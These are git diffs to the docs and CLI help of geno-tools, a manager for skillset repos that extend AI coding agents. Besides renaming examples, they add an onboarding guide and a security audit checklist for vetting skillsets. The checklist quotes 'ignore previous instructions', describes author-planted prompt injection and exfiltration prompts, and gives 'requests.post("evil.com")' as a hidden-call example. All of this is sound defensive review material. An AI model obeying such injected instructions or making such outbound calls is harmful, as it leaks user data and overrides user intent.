+1. Registered repo name (e.g. `geno-<name>` -> git URL from registry; legacy bare slugs like `media` still resolve)
 2. Local directory path
 3. Git URL (`https://`, `git@`, or `*.git`)
 
@@ -50,7 +50,7 @@ geno-tools install ./local-skillset
 Symlink a local checkout as the main worktree. For active development on a skillset.
 
 ```bash
-geno-tools dev geno-media ~/src/geno-media
+geno-tools dev geno-<name> ~/src/geno-<name>
 ```
 
 If the skillset is already installed, it's removed first (configs preserved). The local path becomes a symlink target — edits take effect immediately.
@@ -59,7 +59,7 @@ If the skillset is already installed, it's removed first (configs preserved). Th
 
 | Arg | Description |
 |-----|-------------|
-| `name` | Full repo name (e.g. `geno-media`) |
+| `name` | Full repo name (e.g. `geno-<name>`) |
 | `path` | Path to local checkout |
 
 ---
@@ -69,8 +69,8 @@ If the skillset is already installed, it's removed first (configs preserved). Th
 Create a variant worktree branched off main. Use this to experiment without touching the primary install.
 
 ```bash
-geno-tools fork geno-media exp-1
-geno-tools fork geno-media exp-1 --isolated-venv
+geno-tools fork geno-<name> exp-1
+geno-tools fork geno-<name> exp-1 --isolated-venv
 ```
 
 **Arguments:**
@@ -93,15 +93,15 @@ geno-tools fork geno-media exp-1 --isolated-venv
 Switch the active variant for a skillset.
 
 ```bash
-geno-tools use geno-media@exp-1          # global: repoint active symlink
-geno-tools use geno-media@exp-1 --here   # cwd-only override
+geno-tools use geno-<name>@exp-1          # global: repoint active symlink
+geno-tools use geno-<name>@exp-1 --here   # cwd-only override
 ```
 
 **Arguments:**
 
 | Arg | Description |
 |-----|-------------|
-| `spec` | `<name>@<variant>` format (e.g. `geno-media@exp-1`) |
+| `spec` | `<name>@<variant>` format (e.g. `geno-<name>@exp-1`) |
 
 **Options:**
 
@@ -116,7 +116,7 @@ geno-tools use geno-media@exp-1 --here   # cwd-only override
 Merge a variant back into main. Does not push upstream.
 
 ```bash
-geno-tools promote geno-media exp-1
+geno-tools promote geno-<name> exp-1
 ```
 
 **Arguments:**
@@ -133,7 +133,7 @@ geno-tools promote geno-media exp-1
 Pull latest changes on the main worktree. Slash command: `/gt-update`.
 
 ```bash
-geno-tools update geno-media    # update one
+geno-tools update geno-<name>    # update one
 geno-tools update               # update all
 ```
 
@@ -152,8 +152,8 @@ Skips skillsets in `dev` mode (the source is already live).
 Uninstall a skillset. Replays the install in reverse — deterministic, no orphaned files. Slash command: `/gt-remove`.
 
 ```bash
-geno-tools remove geno-media
-geno-tools remove geno-media --keep-data
+geno-tools remove geno-<name>
+geno-tools remove geno-<name> --keep-data
 ```
 
 **Arguments:**

--- a/docs/docs-home.md
+++ b/docs/docs-home.md
@@ -39,7 +39,7 @@ Install as a Claude Code plugin or via `pipx`. Short names resolve from a curate
 
 ### Skillset ecosystem
 
-Media, research, taxes, kaggle, agents — each a self-contained repo with a declarative manifest.
+Media, research, kaggle, agents — each a self-contained repo with a declarative manifest.
 
 [Browse skillsets :material-arrow-right:](skillsets/index.md)
 </div>

--- a/docs/docs-home.md
+++ b/docs/docs-home.md
@@ -66,11 +66,11 @@ Fork a skillset, experiment in isolation, promote back to main. Git worktrees un
     claude /plugin install 42euge/geno-tools
     pipx install git+https://github.com/42euge/geno-tools
 
-    /gt-ls --available               # see the registry
-    /gt-install media                # install geno-media
-    geno-tools fork media exp-1      # branch a variant
-    geno-tools use media@exp-1       # activate it
-    geno-tools promote media exp-1   # merge back to main
+    /gt-ls --available                    # see the registry
+    /gt-install geno-media                # install geno-media
+    geno-tools fork geno-media exp-1      # branch a variant
+    geno-tools use geno-media@exp-1       # activate it
+    geno-tools promote geno-media exp-1   # merge back to main
     ```
 
 === "CLI only"
@@ -78,11 +78,11 @@ Fork a skillset, experiment in isolation, promote back to main. Git worktrees un
     ```bash
     pipx install git+https://github.com/42euge/geno-tools
 
-    geno-tools ls --available        # see the registry
-    geno-tools install media         # install geno-media
-    geno-tools fork media exp-1      # branch a variant
-    geno-tools use media@exp-1       # activate it
-    geno-tools promote media exp-1   # merge back to main
+    geno-tools ls --available             # see the registry
+    geno-tools install geno-media         # install geno-media
+    geno-tools fork geno-media exp-1      # branch a variant
+    geno-tools use geno-media@exp-1       # activate it
+    geno-tools promote geno-media exp-1   # merge back to main
     ```
 
 </div>

--- a/docs/docs-home.md
+++ b/docs/docs-home.md
@@ -66,11 +66,11 @@ Fork a skillset, experiment in isolation, promote back to main. Git worktrees un
     claude /plugin install 42euge/geno-tools
     pipx install git+https://github.com/42euge/geno-tools
 
-    /gt-ls --available                    # see the registry
-    /gt-install geno-media                # install geno-media
-    geno-tools fork geno-media exp-1      # branch a variant
-    geno-tools use geno-media@exp-1       # activate it
-    geno-tools promote geno-media exp-1   # merge back to main
+    /gt-ls --available                       # see the registry
+    /gt-install geno-<name>                  # install a skillset
+    geno-tools fork geno-<name> exp-1        # branch a variant
+    geno-tools use geno-<name>@exp-1         # activate it
+    geno-tools promote geno-<name> exp-1     # merge back to main
     ```
 
 === "CLI only"
@@ -78,11 +78,11 @@ Fork a skillset, experiment in isolation, promote back to main. Git worktrees un
     ```bash
     pipx install git+https://github.com/42euge/geno-tools
 
-    geno-tools ls --available             # see the registry
-    geno-tools install geno-media         # install geno-media
-    geno-tools fork geno-media exp-1      # branch a variant
-    geno-tools use geno-media@exp-1       # activate it
-    geno-tools promote geno-media exp-1   # merge back to main
+    geno-tools ls --available                # see the registry
+    geno-tools install geno-<name>           # install a skillset
+    geno-tools fork geno-<name> exp-1        # branch a variant
+    geno-tools use geno-<name>@exp-1         # activate it
+    geno-tools promote geno-<name> exp-1     # merge back to main
     ```
 
 </div>

--- a/docs/ecosystem.md
+++ b/docs/ecosystem.md
@@ -21,18 +21,17 @@ The geno-\* ecosystem is a collection of repos that extend AI coding agents with
 | [geno-media](https://github.com/42euge/geno-media) | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts, TTS/STT config |
 | [geno-research](https://github.com/42euge/geno-research) | Wiki-based research, paper generation, repo documentation |
 | [geno-kaggle](https://github.com/42euge/geno-kaggle) | Kaggle benchmarking, notebook upload, discussion scraping |
+| [geno-dev](https://github.com/42euge/geno-dev) | Developer/infrastructure skills — task execution, commit rewriting, Colab plumbing |
 
-### Other
+### Runtime and tooling
 
 | Repo | Description |
 |------|-------------|
-| [geno-bot](https://github.com/42euge/geno-bot) | Bluesky companion bot (geno42) |
-| [geno-colab](https://github.com/42euge/geno-colab) | Google Colab integration |
-| [geno-bench](https://github.com/42euge/geno-bench) | Benchmarking infrastructure |
-| [geno-term](https://github.com/42euge/geno-term) | Terminal utilities |
-| [geno-vla](https://github.com/42euge/geno-vla) | Vision-language-action experiments |
-| [obsidian-geno-claude](https://github.com/42euge/obsidian-geno-claude) | Obsidian plugin for Claude integration |
-| [obsidian-genovox](https://github.com/42euge/obsidian-genovox) | Obsidian voice plugin |
+| [geno-cli](https://github.com/42euge/geno-cli) | Agentic coding assistant TUI powered by Gemma 4 via Ollama |
+| [geno-iso](https://github.com/42euge/geno-iso) | Isolated Docker containers for running Claude Code |
+| [geno-term](https://github.com/42euge/geno-term) | Terminal automation for Claude Code session recovery with iTerm2 tabs and panes |
+| [geno-vla](https://github.com/42euge/geno-vla) | Vision-Language-Action MCP server for Claude Code with smart browser automation |
+| [geno-bench](https://github.com/42euge/geno-bench) | Mine Claude Code session logs for failure patterns and turn observed failures into benchmark tasks |
 
 ## How it fits together
 

--- a/docs/ecosystem.md
+++ b/docs/ecosystem.md
@@ -40,7 +40,7 @@ The geno-\* ecosystem is a collection of repos that extend AI coding agents with
                          │
           ┌──────────────┼──────────────┐
           │              │              │
-     geno-media    geno-research   geno-kaggle  ...
+     geno-<name>   geno-<name>   geno-<name>  ...   (skillsets)
           │              │              │
           └──────────────┼──────────────┘
                          │

--- a/docs/ecosystem.md
+++ b/docs/ecosystem.md
@@ -20,7 +20,6 @@ The geno-\* ecosystem is a collection of repos that extend AI coding agents with
 |------|-------------|
 | [geno-media](https://github.com/42euge/geno-media) | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts, TTS/STT config |
 | [geno-research](https://github.com/42euge/geno-research) | Wiki-based research, paper generation, repo documentation |
-| [geno-taxes](https://github.com/42euge/geno-taxes) | Tax document parsing, YAML organizers, CPA packet prep |
 | [geno-kaggle](https://github.com/42euge/geno-kaggle) | Kaggle benchmarking, notebook upload, discussion scraping |
 
 ### Other

--- a/docs/getting-started.md
+++ b/docs/getting-started.md
@@ -49,17 +49,17 @@ geno-tools ls --available
 ```
 
 ```
-  agents       https://github.com/42euge/geno-agents.git
-  media        https://github.com/42euge/geno-media.git
-  research     https://github.com/42euge/geno-research.git
-  kaggle       https://github.com/42euge/geno-kaggle.git
-  dev          https://github.com/42euge/geno-dev.git
+  geno-agents              https://github.com/42euge/geno-agents.git
+  geno-media               https://github.com/42euge/geno-media.git
+  geno-research            https://github.com/42euge/geno-research.git
+  geno-kaggle              https://github.com/42euge/geno-kaggle.git
+  geno-dev                 https://github.com/42euge/geno-dev.git
 ```
 
 Install one:
 
 ```bash
-geno-tools install media
+geno-tools install geno-media
 ```
 
 This clones the repo, sets up any declared venvs, and wires the skill into your coding agent (slash commands appear immediately).
@@ -79,7 +79,7 @@ geno-tools ls
 If you're hacking on a skillset, use `dev` to symlink your local checkout instead of cloning:
 
 ```bash
-geno-tools dev media ~/src/geno-media
+geno-tools dev geno-media ~/src/geno-media
 ```
 
 Edits to your local checkout take effect immediately — no reinstall needed.

--- a/docs/getting-started.md
+++ b/docs/getting-started.md
@@ -52,7 +52,6 @@ geno-tools ls --available
   agents       https://github.com/42euge/geno-agents.git
   media        https://github.com/42euge/geno-media.git
   research     https://github.com/42euge/geno-research.git
-  taxes        https://github.com/42euge/geno-taxes.git
   kaggle       https://github.com/42euge/geno-kaggle.git
   dev          https://github.com/42euge/geno-dev.git
 ```

--- a/docs/getting-started.md
+++ b/docs/getting-started.md
@@ -59,7 +59,7 @@ geno-tools ls --available
 Install one:
 
 ```bash
-geno-tools install geno-media
+geno-tools install geno-<name>
 ```
 
 This clones the repo, sets up any declared venvs, and wires the skill into your coding agent (slash commands appear immediately).
@@ -71,7 +71,7 @@ geno-tools ls
 ```
 
 ```
-  geno-media               active: main
+  geno-<name>              active: main
 ```
 
 ## Develop a skillset locally
@@ -79,7 +79,7 @@ geno-tools ls
 If you're hacking on a skillset, use `dev` to symlink your local checkout instead of cloning:
 
 ```bash
-geno-tools dev geno-media ~/src/geno-media
+geno-tools dev geno-<name> ~/src/geno-<name>
 ```
 
 Edits to your local checkout take effect immediately — no reinstall needed.

--- a/docs/onboarding/audit.md
+++ b/docs/onboarding/audit.md
@@ -1,0 +1,116 @@
+# Audit Process
+
+The audit checklist. Run it before approving a skillset for the public registry, and before admitting one to an enterprise namespace.
+
+A skillset is allowed to inject prompts into the agent's context, run shell commands, install Python dependencies, and symlink files into the user's home directory. Audit accordingly. The bar is "would I install this on my own machine."
+
+## When to run the audit
+
+- **Initial onboarding** — first inclusion in the registry (public) or internal mirror (enterprise).
+- **Major version bump** — any release that changes `SKILL.md` content, adds slash commands, changes `pyproject.toml` dependencies, or modifies runtime symlinks.
+- **Maintainer change** — when ownership transfers to a new author.
+- **Periodic re-audit** — every 6 months for high-traffic skillsets, opportunistically for the rest.
+
+A patch-level update that only touches docs or already-audited prompt content does not require a full re-audit.
+
+## How to run it
+
+1. Clone the repo at the exact ref being onboarded (don't audit `main` if the PR pins `v0.3.0`).
+2. Walk the checklist below from top to bottom.
+3. File concrete findings as PR comments — link to file/line, not vibes.
+4. Sign off when every item is **pass**, **n/a**, or **accepted with mitigation**.
+
+For enterprise, capture the result as a signed artifact (PR description, internal ticket, or platform-team doc) so the decision is reproducible.
+
+## The checklist
+
+### 1. Identity and provenance
+
+- [ ] Repo name follows `{prefix}-{slug}` exactly. No spaces, no underscores, no double dashes.
+- [ ] `SKILL.md` frontmatter `name` matches the repo name.
+- [ ] Author/maintainer is identifiable — GitHub handle, email, or team in `SKILL.md` metadata.
+- [ ] License file present and compatible with the consuming environment (MIT/Apache/BSD for public; whatever your company allows for enterprise).
+- [ ] Git history is the author's, not a transplanted set of unrelated commits hiding origin.
+
+### 2. SKILL.md content (umbrella + subskillsets)
+
+- [ ] Description is honest and scoped — it actually describes what the skill does, not aspirational marketing.
+- [ ] Activation guidance ("use when X") is specific enough that the agent won't fire it on unrelated requests.
+- [ ] No prompt-injection vectors: no instructions that override the user's intent, no "ignore previous instructions" patterns, no hidden role-play scaffolding.
+- [ ] No data exfiltration prompts — the skill must not instruct the agent to send file contents, env vars, secrets, or chat history to any external endpoint.
+- [ ] `allowed-tools` (when present) is the minimum needed. Reject blanket `Bash(*)` if the skill only needs a few commands.
+- [ ] Subskillsets under `skills/<subskill>/SKILL.md` follow the same rules. Each is audited individually.
+
+### 3. Slash commands (`commands/*.md`)
+
+- [ ] Filenames follow the prefix convention so users see consistent `/{prefix}-*` naming.
+- [ ] No command shells out via untrusted input without quoting/escaping.
+- [ ] No command writes outside `~/.geno-tools/{repo}/`, the user's working directory, or explicit user-confirmed paths.
+- [ ] No command touches another skillset's directory.
+- [ ] Side-effecting commands (network calls, deletes, pushes, sends) require user confirmation in the prompt.
+
+### 4. Code, dependencies, and runtime
+
+- [ ] `pyproject.toml` deps are pinned or version-bounded. No unbounded `*` requirements.
+- [ ] No deps from unmaintained or low-trust sources (typosquats, abandoned packages).
+- [ ] Top-level Python modules import only what they declare. No surprise `requests.post("evil.com")` at import time.
+- [ ] Any runtime symlinks (`scripts/`) target files inside the repo, not absolute paths elsewhere.
+- [ ] Any post-install hooks are inspectable and idempotent.
+
+### 5. Network and data boundaries
+
+- [ ] All outbound network calls are documented in `SKILL.md` (which hosts, why, what data).
+- [ ] No telemetry to third parties without explicit opt-in.
+- [ ] No credentials, tokens, or API keys committed to the repo (even in tests or fixtures).
+- [ ] Cloud/SaaS integrations document where keys are read from (env var, keychain) and never log them.
+- [ ] For enterprise: confirm that the skill's network destinations are on the allowlist.
+
+### 6. Filesystem and host impact
+
+- [ ] Install touches only `~/.geno-tools/<repo>/` for state. Anything outside that path is opt-in and documented.
+- [ ] Removal (`geno-tools remove <slug>`) cleans up everything the install added (caveat: `--keep-data` is allowed to retain user data).
+- [ ] No silent modifications to `~/.zshrc`, `~/.bashrc`, `~/.config/`, etc.
+- [ ] No `sudo` invocations.
+
+### 7. Multi-agent integration
+
+- [ ] `npx skills add` registers the skill cleanly across all supported agents (Claude Code, Codex, Cursor, Gemini CLI, OpenCode).
+- [ ] Manifests at `.claude-plugin/`, `.codex-plugin/`, `.cursor-plugin/`, `.opencode/`, and `gemini-extension.json` (if shipped) point at the shared `skills/` directory and don't diverge per platform.
+- [ ] Skill activates and produces sane output on at least one supported agent in a fresh install.
+
+### 8. Documentation
+
+- [ ] README explains: what it does, install, prerequisites, supported platforms, removal.
+- [ ] `SKILL.md` lists every slash command with a one-line description.
+- [ ] Any required env vars / external services are documented up front.
+- [ ] A `CHANGELOG` or release notes exist for non-trivial versions.
+
+### 9. Removal contract
+
+- [ ] `geno-tools remove <slug>` runs to completion with no errors.
+- [ ] After removal: `~/.geno-tools/<repo>/` is gone (or empty, if `--keep-data`), `~/.local/bin/` symlinks owned by this skillset are gone, and `npx skills remove` reports the skill removed from every agent it was registered with.
+
+### 10. Sign-off
+
+- [ ] Every item above is pass / n/a / accepted-with-mitigation.
+- [ ] A reviewer is named in the PR / ticket.
+- [ ] The audit artifact (PR comment or internal doc) is linked from the registry entry or internal manifest.
+
+## Failure modes — common reasons we reject
+
+- **Aspirational SKILL.md** — describes capabilities the code doesn't implement. Misleads the agent into trying to invoke things that don't exist.
+- **Prompt injection by author** — `SKILL.md` contains "always run X first" or "never tell the user about Y." Hard reject.
+- **Unpinned wildcard deps** — `requests = "*"` lets a future bad release of `requests` ride in.
+- **Hidden network calls** — module imports that POST to a third-party endpoint at install or first use.
+- **Cross-skillset writes** — a skill that mutates `~/.geno-tools/{another-skillset}/` directly instead of going through `geno-tools`.
+- **Silent shell rc edits** — appending to `~/.zshrc` without telling the user.
+
+## Lightweight re-audit
+
+For minor updates already covered by a previous full audit, run a delta audit:
+
+1. `git diff <last-audited-ref>..<new-ref>` — confirm only docs/comment changes.
+2. `git diff -- pyproject.toml requirements*.txt` — confirm no dep changes.
+3. `git diff -- 'SKILL.md' 'skills/**/SKILL.md' 'commands/**'` — confirm no prompt or command changes.
+
+If any of those return non-trivial diffs, escalate to a full audit.

--- a/docs/onboarding/audit.md
+++ b/docs/onboarding/audit.md
@@ -68,7 +68,7 @@ For enterprise, capture the result as a signed artifact (PR description, interna
 ### 6. Filesystem and host impact
 
 - [ ] Install touches only `~/.geno-tools/<repo>/` for state. Anything outside that path is opt-in and documented.
-- [ ] Removal (`geno-tools remove <slug>`) cleans up everything the install added (caveat: `--keep-data` is allowed to retain user data).
+- [ ] Removal (`geno-tools remove <repo-name>`) cleans up everything the install added (caveat: `--keep-data` is allowed to retain user data).
 - [ ] No silent modifications to `~/.zshrc`, `~/.bashrc`, `~/.config/`, etc.
 - [ ] No `sudo` invocations.
 
@@ -87,7 +87,7 @@ For enterprise, capture the result as a signed artifact (PR description, interna
 
 ### 9. Removal contract
 
-- [ ] `geno-tools remove <slug>` runs to completion with no errors.
+- [ ] `geno-tools remove <repo-name>` runs to completion with no errors.
 - [ ] After removal: `~/.geno-tools/<repo>/` is gone (or empty, if `--keep-data`), `~/.local/bin/` symlinks owned by this skillset are gone, and `npx skills remove` reports the skill removed from every agent it was registered with.
 
 ### 10. Sign-off

--- a/docs/onboarding/index.md
+++ b/docs/onboarding/index.md
@@ -1,0 +1,52 @@
+# Onboarding
+
+This section covers everything that happens **before** a skillset is trusted and installed — both on the public side (adding a repo to the geno registry) and on the enterprise side (admitting a skillset to a company's internal namespace).
+
+A skillset can ship arbitrary `SKILL.md` content, slash commands, Python code, and runtime symlinks. The agent will read and act on all of it. Onboarding is the rigor that gates that trust.
+
+## Who this is for
+
+- **Authors** — you wrote a new `{prefix}-{slug}` repo and want it installable by short slug or by URL.
+- **Maintainers** — you review PRs that add entries to `genotools/registry.py`.
+- **Enterprise platform teams** — you decide which skillsets a company's developers can install internally, and you want a documented bar to check against.
+
+## The two-track flow
+
+| Track | Audience | Trust gate |
+|-------|----------|-----------|
+| **Public** | Anyone publishing under `geno-*` (or wanting their repo added to the registry) | PR review against the [audit checklist](audit.md) |
+| **Enterprise** | Internal skillsets under a company namespace (e.g. `acme-*`) | The same audit checklist, run by the platform team before merging into the company's mirror or registry fork |
+
+The checklist is the same. The reviewer changes.
+
+## Onboarding a public skillset
+
+1. **Author the repo.** Follow [Creating a Skillset](../skillsets/creating.md). Minimum viable: a root `SKILL.md` and a `commands/` directory.
+2. **Self-test.** `geno-tools dev <slug> ~/src/<repo>` to install from a local checkout, then exercise every slash command.
+3. **Push to a public git remote.** Anyone can already install it via direct URL at this point: `geno-tools install https://github.com/you/your-skillset.git`.
+4. **Open a registry PR.** Add `"<slug>": "<git-url>"` to `genotools/registry.py` and the corresponding row to `docs/skillsets/index.md` and the README's existing-repos table.
+5. **Pass the audit.** A maintainer runs through [the audit checklist](audit.md) and either approves, requests changes, or closes the PR.
+6. **Ship.** Once merged, `geno-tools install <slug>` resolves to your repo for everyone.
+
+## Onboarding an enterprise (private) skillset
+
+The shape is identical, the boundary is internal:
+
+1. **Pick the namespace.** Use your company slug as the prefix — `acme-incident-response`, `acme-finance`, etc. See the [Enterprise pattern](../../README.md#enterprise-private-skillsets-public-tooling) in the README.
+2. **Author against the same skillset spec.** No fork of geno-tools needed; the on-disk format is identical to public skillsets.
+3. **Host in your private remote.** GitHub Enterprise, GitLab, Bitbucket, internal mirror — anywhere git can clone from.
+4. **Run the audit internally.** Use [the audit checklist](audit.md) as your platform team's review template. Treat the result as a sign-off artifact.
+5. **Distribute.** Either:
+    - **Direct URL** — developers run `geno-tools install git@github.acme.com:platform/acme-finance.git`, or
+    - **Forked registry** — maintain an internal fork of `genotools/registry.py` (or a thin wrapper) that lists your approved internal slugs.
+
+## What "onboarded" means in practice
+
+A skillset is considered onboarded when:
+
+- The audit checklist has been completed and signed off.
+- The repo is reachable from the install path the audience uses (public registry / direct URL / internal mirror).
+- The agent integrations have been verified end-to-end on at least one supported CLI (Claude Code, Codex, Cursor, Gemini CLI, OpenCode).
+- A clear point of contact is listed in `SKILL.md` metadata.
+
+Anything short of that is "experimental" — fine for `geno-tools dev` and direct-URL installs, not yet fit for the curated registry or an enterprise's approved list.

--- a/docs/onboarding/index.md
+++ b/docs/onboarding/index.md
@@ -22,11 +22,11 @@ The checklist is the same. The reviewer changes.
 ## Onboarding a public skillset
 
 1. **Author the repo.** Follow [Creating a Skillset](../skillsets/creating.md). Minimum viable: a root `SKILL.md` and a `commands/` directory.
-2. **Self-test.** `geno-tools dev <slug> ~/src/<repo>` to install from a local checkout, then exercise every slash command.
+2. **Self-test.** `geno-tools dev <repo-name> ~/src/<repo-name>` to install from a local checkout, then exercise every slash command.
 3. **Push to a public git remote.** Anyone can already install it via direct URL at this point: `geno-tools install https://github.com/you/your-skillset.git`.
-4. **Open a registry PR.** Add `"<slug>": "<git-url>"` to `genotools/registry.py` and the corresponding row to `docs/skillsets/index.md` and the README's existing-repos table.
+4. **Open a registry PR.** Add `"<repo-name>": "<git-url>"` to `genotools/registry.py` and the corresponding row to `docs/skillsets/index.md` and the README's existing-repos table.
 5. **Pass the audit.** A maintainer runs through [the audit checklist](audit.md) and either approves, requests changes, or closes the PR.
-6. **Ship.** Once merged, `geno-tools install <slug>` resolves to your repo for everyone.
+6. **Ship.** Once merged, `geno-tools install <repo-name>` resolves to your repo for everyone (e.g. `geno-tools install geno-media`).
 
 ## Onboarding an enterprise (private) skillset
 
@@ -36,9 +36,39 @@ The shape is identical, the boundary is internal:
 2. **Author against the same skillset spec.** No fork of geno-tools needed; the on-disk format is identical to public skillsets.
 3. **Host in your private remote.** GitHub Enterprise, GitLab, Bitbucket, internal mirror — anywhere git can clone from.
 4. **Run the audit internally.** Use [the audit checklist](audit.md) as your platform team's review template. Treat the result as a sign-off artifact.
-5. **Distribute.** Either:
-    - **Direct URL** — developers run `geno-tools install git@github.acme.com:platform/acme-finance.git`, or
-    - **Forked registry** — maintain an internal fork of `genotools/registry.py` (or a thin wrapper) that lists your approved internal slugs.
+5. **Distribute.** Pick whichever of these fits your environment:
+    - **Direct URL** — developers run `geno-tools install git@github.acme.com:platform/acme-finance.git`.
+    - **Discovery sources** — configure geno-tools to crawl your GitHub org, GitLab group, or Gitea/Bitbucket project for repos that look like skillsets. Developers then run `geno-tools ls --available` and see your internal repos alongside public ones. See [Enterprise discovery](#enterprise-discovery) below.
+    - **Forked registry** — maintain an internal fork of `genotools/registry.py` (or a thin wrapper) that lists your approved internal repo names.
+
+## Enterprise discovery
+
+The point of discovery is so a platform team doesn't have to PR every new internal skillset — they just publish one (or more) source URLs in `~/.geno/config.yaml`, and any compliant repo under those sources becomes installable.
+
+A repo is considered a candidate skillset when it has a top-level `SKILL.md` and matches the `{namespace}-*` naming convention (e.g. `acme-*`).
+
+Configure sources in `~/.geno/config.yaml`:
+
+```yaml
+discovery:
+  sources:
+    - kind: github
+      org: 42euge          # public — discovers geno-* automatically
+    - kind: github
+      org: acme-corp
+      base_url: https://github.acme.com/api/v3   # GitHub Enterprise
+      prefix: acme-
+      auth_env: ACME_GITHUB_TOKEN
+    - kind: gitlab
+      group: platform/skillsets
+      base_url: https://gitlab.acme.com
+      prefix: acme-
+      auth_env: ACME_GITLAB_TOKEN
+```
+
+`geno-tools ls --available` runs each source through the appropriate provider, filters to repos that pass the candidate check, and lists them with their canonical repo name. `geno-tools install <repo>` then resolves through the same source. No extra step beyond editing the config.
+
+The discovery layer is intentionally pluggable — adding a new provider (Bitbucket, Gitea, Azure DevOps) is a matter of implementing a small `list_repos()` function, not changing the install flow. Walking through onboarding with an agent is automated by the [`geno-onboarding`](../../skills/geno-onboarding/SKILL.md) skill.
 
 ## What "onboarded" means in practice
 

--- a/docs/onboarding/index.md
+++ b/docs/onboarding/index.md
@@ -26,7 +26,7 @@ The checklist is the same. The reviewer changes.
 3. **Push to a public git remote.** Anyone can already install it via direct URL at this point: `geno-tools install https://github.com/you/your-skillset.git`.
 4. **Open a registry PR.** Add `"<repo-name>": "<git-url>"` to `genotools/registry.py` and the corresponding row to `docs/skillsets/index.md` and the README's existing-repos table.
 5. **Pass the audit.** A maintainer runs through [the audit checklist](audit.md) and either approves, requests changes, or closes the PR.
-6. **Ship.** Once merged, `geno-tools install <repo-name>` resolves to your repo for everyone (e.g. `geno-tools install geno-media`).
+6. **Ship.** Once merged, `geno-tools install <repo-name>` resolves to your repo for everyone.
 
 ## Onboarding an enterprise (private) skillset
 

--- a/docs/skillsets/creating.md
+++ b/docs/skillsets/creating.md
@@ -112,7 +112,7 @@ Write these as instructions for the agent — what to do when the user invokes t
 Use `dev` to link your local checkout:
 
 ```bash
-geno-tools dev myskill ~/src/geno-myskill
+geno-tools dev geno-myskill ~/src/geno-myskill
 ```
 
 Edits take effect immediately. When you're happy, push to a git remote and others can install it:
@@ -126,9 +126,9 @@ geno-tools install https://github.com/you/geno-myskill.git
 To add your skillset to the built-in registry, submit a PR adding an entry to `genotools/registry.py`:
 
 ```python
-_REGISTRY: dict[str, str] = {
+_FALLBACK: dict[str, str] = {
     # ...existing entries...
-    "myskill": "https://github.com/you/geno-myskill.git",
+    "geno-myskill": "https://github.com/you/geno-myskill.git",
 }
 ```
 

--- a/docs/skillsets/index.md
+++ b/docs/skillsets/index.md
@@ -11,7 +11,6 @@ These skillsets are built into the geno-tools registry and can be installed by s
 | `agents` | [geno-agents](https://github.com/42euge/geno-agents) | Agent coordination, registration, status updates, autonomous loops |
 | `media` | [geno-media](https://github.com/42euge/geno-media) | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts, TTS/STT |
 | `research` | [geno-research](https://github.com/42euge/geno-research) | Wiki-based research, paper generation, repo documentation |
-| `taxes` | [geno-taxes](https://github.com/42euge/geno-taxes) | Tax document parsing, CPA packet prep, filing checklists |
 | `kaggle` | [geno-kaggle](https://github.com/42euge/geno-kaggle) | Kaggle benchmarking, notebook upload, competition discussion scraping |
 | `dev` | [geno-dev](https://github.com/42euge/geno-dev) | Developer utilities (planned) |
 

--- a/docs/skillsets/index.md
+++ b/docs/skillsets/index.md
@@ -4,21 +4,21 @@ A **skillset** is a self-contained repo that adds capabilities to an AI coding a
 
 ## Registry
 
-These skillsets are built into the geno-tools registry and can be installed by short name:
+These skillsets are built into the geno-tools registry and can be installed by full repo name:
 
-| Name | Repo | Description |
-|------|------|-------------|
-| `agents` | [geno-agents](https://github.com/42euge/geno-agents) | Agent coordination, registration, status updates, autonomous loops |
-| `media` | [geno-media](https://github.com/42euge/geno-media) | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts, TTS/STT |
-| `research` | [geno-research](https://github.com/42euge/geno-research) | Wiki-based research, paper generation, repo documentation |
-| `kaggle` | [geno-kaggle](https://github.com/42euge/geno-kaggle) | Kaggle benchmarking, notebook upload, competition discussion scraping |
-| `dev` | [geno-dev](https://github.com/42euge/geno-dev) | Developer utilities (planned) |
+| Repo | Description |
+|------|-------------|
+| [geno-agents](https://github.com/42euge/geno-agents) | Agent coordination, registration, status updates, autonomous loops |
+| [geno-media](https://github.com/42euge/geno-media) | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts, TTS/STT |
+| [geno-research](https://github.com/42euge/geno-research) | Wiki-based research, paper generation, repo documentation |
+| [geno-kaggle](https://github.com/42euge/geno-kaggle) | Kaggle benchmarking, notebook upload, competition discussion scraping |
+| [geno-dev](https://github.com/42euge/geno-dev) | Developer utilities (planned) |
 
 Install any of them:
 
 ```bash
-geno-tools install media
-geno-tools install research
+geno-tools install geno-media
+geno-tools install geno-research
 ```
 
 ## What a skillset provides

--- a/docs/skillsets/index.md
+++ b/docs/skillsets/index.md
@@ -17,8 +17,7 @@ These skillsets are built into the geno-tools registry and can be installed by f
 Install any of them:
 
 ```bash
-geno-tools install geno-media
-geno-tools install geno-research
+geno-tools install geno-<name>
 ```
 
 ## What a skillset provides

--- a/genotools/cli.py
+++ b/genotools/cli.py
@@ -13,7 +13,7 @@ def main(argv: list[str] | None = None) -> int:
     p_ls.add_argument("--available", action="store_true", help="list registry")
 
     p_install = sub.add_parser("install", help="install a skillset")
-    p_install.add_argument("name", help="full repo name (e.g. geno-media), git URL, or local path")
+    p_install.add_argument("name", help="full repo name (e.g. geno-<name>), git URL, or local path")
     p_install.add_argument("--here", action="store_true",
                            help="materialize cwd alias symlinks for this skillset")
 
@@ -28,7 +28,7 @@ def main(argv: list[str] | None = None) -> int:
                         help="create a fresh venv for this variant instead of sharing")
 
     p_use = sub.add_parser("use", help="select a variant")
-    p_use.add_argument("spec", help="<name>@<variant> (e.g. geno-media@exp-1)")
+    p_use.add_argument("spec", help="<name>@<variant> (e.g. geno-<name>@exp-1)")
     p_use.add_argument("--here", action="store_true",
                        help="cwd-only override; otherwise repoint global active symlink")
 

--- a/genotools/cli.py
+++ b/genotools/cli.py
@@ -13,7 +13,7 @@ def main(argv: list[str] | None = None) -> int:
     p_ls.add_argument("--available", action="store_true", help="list registry")
 
     p_install = sub.add_parser("install", help="install a skillset")
-    p_install.add_argument("name", help="short name (e.g. taxes), full name (geno-taxes), git URL, or local path")
+    p_install.add_argument("name", help="full repo name (e.g. geno-media), git URL, or local path")
     p_install.add_argument("--here", action="store_true",
                            help="materialize cwd alias symlinks for this skillset")
 
@@ -28,7 +28,7 @@ def main(argv: list[str] | None = None) -> int:
                         help="create a fresh venv for this variant instead of sharing")
 
     p_use = sub.add_parser("use", help="select a variant")
-    p_use.add_argument("spec", help="<name>@<variant> (e.g. taxes@exp-1)")
